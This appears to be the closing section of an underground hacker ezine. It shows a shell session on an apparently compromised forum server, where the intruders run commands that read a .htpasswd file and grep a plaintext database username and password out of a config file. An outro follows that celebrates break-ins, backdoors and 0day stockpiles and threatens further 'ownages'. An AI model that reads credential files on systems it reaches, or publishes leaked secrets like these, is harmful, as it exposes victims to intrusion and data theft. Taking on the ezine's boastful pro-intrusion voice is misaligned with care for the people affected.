-rw-r--r--   1 wayne  www    5612 Jun 21 20:15 printthread.php
-rw-r--r--   1 wayne  www   59005 Jun 21 20:15 private.php
-rw-r--r--   1 wayne  www       9 Jun 21 20:15 pw.php
-rw-r--r--   1 wayne  www    3258 Jun 21 20:16 ratethread.php
-rw-r--r--   1 wayne  www    5058 Jun 21 20:16 report.php
-rw-r--r--   1 wayne  www    1940 Jun 22 10:29 reportpm.php
-rw-r--r--   1 wayne  www   23508 Jun 21 20:16 reputation.php
-rw-r--r--   1 wayne  www     407 Jun 21 20:16 rss.php
-rw-r--r--   1 wayne  www   43265 Jun 21 20:16 search.php
drwxr-xr-x   8 wayne  www     512 Jul  8 14:35 securimage
-rw-r--r--   1 wayne  www    4740 Jun 21 20:16 sendthread.php
-rw-r--r--   1 wayne  www    4569 Jun 21 20:16 showteam.php
-rw-r--r--   1 wayne  www   37878 Jun 21 20:16 showthread.php
-rw-r--r--   1 wayne  www    5409 Jun 21 20:16 stats.php
-rw-r--r--   1 wayne  www    5303 Jun 21 20:16 syndication.php
-rw-r--r--   1 wayne  www    1585 Jun 21 20:16 task.php
drwxrwxrwx   3 wayne  www     512 Jun 21 20:25 uploads
-rw-r--r--   1 wayne  www   98257 Jun 21 20:16 usercp.php
-rw-r--r--   1 wayne  www    4720 Jun 21 20:16 usercp2.php
-rw-r--r--   1 wayne  www   35113 Jun 21 20:16 warnings.php
-rw-r--r--   1 wayne  www   22808 Jun 21 20:16 xmlhttp.php

# find . -name ".ht*" 
./cgi-bin/.htaccess
./mail/data/.htaccess
./mail/logs/.htaccess
./mail/temp/cache/.htaccess
./mail/temp/session/.htaccess
./mail/temp/.htaccess
./msd41567651564765156/.htaccess
./msd41567651564765156/.htpasswd
./pma/libraries/.htaccess
./pma/setup/frames/.htaccess
./pma/setup/lib/.htaccess
./securimage/database/.htaccess

# cat ./msd41567651564765156/.htpasswd
wayne:waBOsDVargS1U

# grep username inc/config.php
$config['database']['username'] = 'wayne_sql';

# grep password inc/config.php
$config['database']['password'] = '98adzsdgzsdhfuhsdfsdo8f';


                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------==========={  Outro  }===========))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
It's been  one  and a  half year since  we pub- ~  |     ||(      );, 
lished exp01.  Three ezines  full of  ownages and  (   ,;.)-\    / ';,
stories isn't  a  bad figure,  is it? At least we   \ (       \ (     
think  that those  and  especially  this one  will   ||         \\    
cause enough fear for the  feature and people will   /_(         /_(   
realize that there are still some guys left who continue  to  preserve
the spirit of the underground, like real hackers used to.  Hackers  do
not  sell  credit  cards.  Hackers  hack,  that  means  breaking  into
computer systems and striving for perfection. That's our opinion, even
if most don't believe that way. We ourselves will never  stop hacking.
Designing new backdooring techniques and farming 0days  has  become  a
way of life. Owning people who deserve  it  and  collecting  data  has
become a mental belief. We will be prepared for the  future,  even  if
the kids decide to switch to Windows 8. Our belts  contain  more  0day
bullets than ten glocks can carry  and  for  exceptions  we  have  our
special task force at the Gorch Fock. No matter what, "they"  will  be
owned.

It's going to happen, again and again. It has to happen. 

In  the  meantime  we  started  to  think  that  it  might  be   worth
concentrating on the international scene, but that does not mean  that
we stop observing any movement in the German one, even if we are  sick
of   it.   Really   sick.   This   is   going   to   be    the    hash
c949d6f078f9c0661d0e91cce74e4ad16b30e7c9 whose plaintext value we  are
going to publish in our next release so you  better  watch  out!  With
these last words we finally close this ezine.
                   _                                                  
            _,-'/-'/                                                  
.      __,-; ,'( '/                                                   
 \.    `-.__`-._`:_,-._       _ , . ``                                
  `:-._,------' ` _,`--` -: `_ , ` ,' :                               
     `---..__,,--'            ` -'. -'                                
                                                                      
                                   |\_    The show is over            
                                  /()/            _                   
                                  `\|             \`-\`-._            
                                                   \` )`. `-.__      ,
     But we are not done yet    '' , . _       _,-._;'_,-`__,-'    ,/ 
                               : `. ` , _' :- '--'._ ' `------._,-;'  
                               `- ,`- '              `--..__,,---'    
                                                                      
                                                    - the Happy Ninjas